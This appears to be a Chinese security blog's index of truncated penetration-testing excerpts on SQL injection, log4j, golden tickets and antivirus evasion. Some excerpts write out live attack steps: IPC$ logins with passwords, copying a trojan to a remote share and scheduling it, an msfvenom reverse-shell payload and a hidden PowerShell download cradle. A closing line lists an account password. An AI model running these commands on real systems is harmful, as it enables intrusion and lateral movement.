Access数据库 是一种非常简单但是功能完整的数据库，很适合小型网站创建，可以很轻松管理表和列，有很多管理工具 手工注入 判断注入点 1.这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:40000/new_list.asp?id12.…

文章感受 一. 文章来源 http://tool.chinaz.com/tools/unicode.aspx 二. 理解感受 总共有的编码方式有。 1.unicode 编码 2.UTF-8编码 3.unix的时间编码 4.native和Ascli编码互转。 5.hex编码、解码 6.html编码，解码 7.base64 编码，解码 三. 文章质量…

自动收集信息 为了简化操作，可以创建一个脚本， 在目标机器上完成流程、服务、用户账号、用户组、网时区等信息的查询工作。网上有很多类似的脚本，当然，我们也可以自己定制一个。在这里，笔者推荐一个利用WMIC收集月标机…

一、场景 又是一次接外包项目去甲方做渗透的一天，到了现场，发现甲方爸爸的是一家国企，国企的服务器搭建，普遍比较乱，不出所料，第一天去现场，我还以为是他们给资产，我们渗透就行了&a…

域渗透对于初学者来说，主要难点在于涉及域的基础理论知识较多，比如ACL访问控制、DcSync权限、黄金票据、白银票据、Access Token、哈希传递等等。 ACL–访问控制列表 访问控制列表(ACL)是应用在路由器接口的指令列表(即规则)。指令列表用来告诉路由器&…

0x01-前言 昨晚爆出的log4j rce 是通过lookup触发的漏洞，但jdk1.8.191以上默认不支持ldap协议，对于高版本jdk,则需要一定的依赖。不过为了给大家最简单的说明，我这里还是用jdk1.8.144的版本来运行。 0x02-靶场搭建 docker 搭建方式 docke…

1、前言 看雪安全接入（KSA），一款傻瓜式的一键接入私有网络的工具，无论您在任何地点、任何时间、使用任何线路，均可利用这一服务接入自己的私有设备。 KSA的服务端和客户端集成在一个可执行文件之中，目前支…

0x01 前言 相信准备学习内网渗透的人，都会知道有黄金票据这个事情，而黄金票据的原理是和攻击方式，网站说的都一大堆概念，很难懂，这里我说声明一下，黄金票据的作用在于做权限维持 ，原理在于域服…

0x01 条件 1、我们获取到目标主机管理员账号密码，并且目标主机的 139，445端口是开启的， 0x02 建立ipc协议拷贝cs木马 这时候， 我们可以先建立ips 协议， net use \ip\ipc$ 密码 /user:账号 例子 net use \\192.168.93…

0x01 前言 1\当我们建立完ipc连接 shell net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator2、查看连接 3、用命令copy 木马过去 shell copy C:\phpStudy\PHPTutorial\WWW\public\nw.exe \\192.168.138.138\c$4、用 at \192.168.138.138 16:53:11 …

0x01 前言 在攻防演练时，当我们拿下主机时，我们要开始对内网进行渗透，常见的手法有，frp，ew，等代理工具，这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本&#xf…

0x01 前言 这几天我的msf 要生成linux 的木马 一直反弹不成功，用的是以下的paylaod msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST192.168.233.131 LPORT4444 -f elf > mshell.elf 我分析了一下报错，这个报错是没问题的，但生成的…

一、免杀思路 应该说每一类型的恶意软件所实施的反检测技术都是不一样的（恶意软件可以分为病毒、木马、僵尸程序、流氓软件、勒索软件、广告程序等），虽然本文会对所有相关的反检测技术都进行介绍，但我们还是会将注意力放在stager…

0x01 前言 当我们进内网的的时候，会遇到永恒之蓝这种漏洞，之前不懂代理的时候，总是不找到怎么利用，等到我学会了流量代理，frp等工具，才慢慢理解各种协议，各种流量方式的通信方式。 初级–》frp…

0x01前言 当我们要上线主机的时候，可能会因为你的代码含有木马字符串，导致无法上线 0x02问题 1、 例子 powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA 2、原句子 powershell.exe -nop -w hidden -c "IEX ((new-objec…

一、前提 drozer是一款针对Android系统的安全测试框架，可以分成两个部分：其一是apk文件客户端，它运行在本地计算机上；其二是msi文件服务端，然后进行连接。 在官网下载drozer.msi安装到电脑，drozer.apk装到…

一、前言 本文将从八个方面阐述，分别是：应急响应的整体思路、应急响应的基本流程、应急工具集简介、系统日志及日志分析、威胁情报的作用、常见病毒及分类、理解漏洞和补丁、技能提升建议。 2022年信息安全事件频发，信息安全的技能、人才需…

1、前言 ①、相信大家应该听说过ai绘图，就是通过一些文字描写，去绘制你想要的图片。 ②、因为这里用到的是白嫖colab谷歌服务器无需本地显卡，所以需要能访问谷歌的代理。 2、实现 https://colab.research.google.com/drive/1_Ma71L6uGbtt…

问题呈现 打开WiFi，查看流量使用情况。 发现最近30天qq音乐使用了大量的流量 打开360的流量监视器，发现上传流量比下载流量都多。 原理讲解 市面上几乎所有的影视音乐软件都会使用这种p2p技术节约自身服务器带宽成本。 就是把你的歌曲下载到你的电脑…

账号：username 密码：axqsn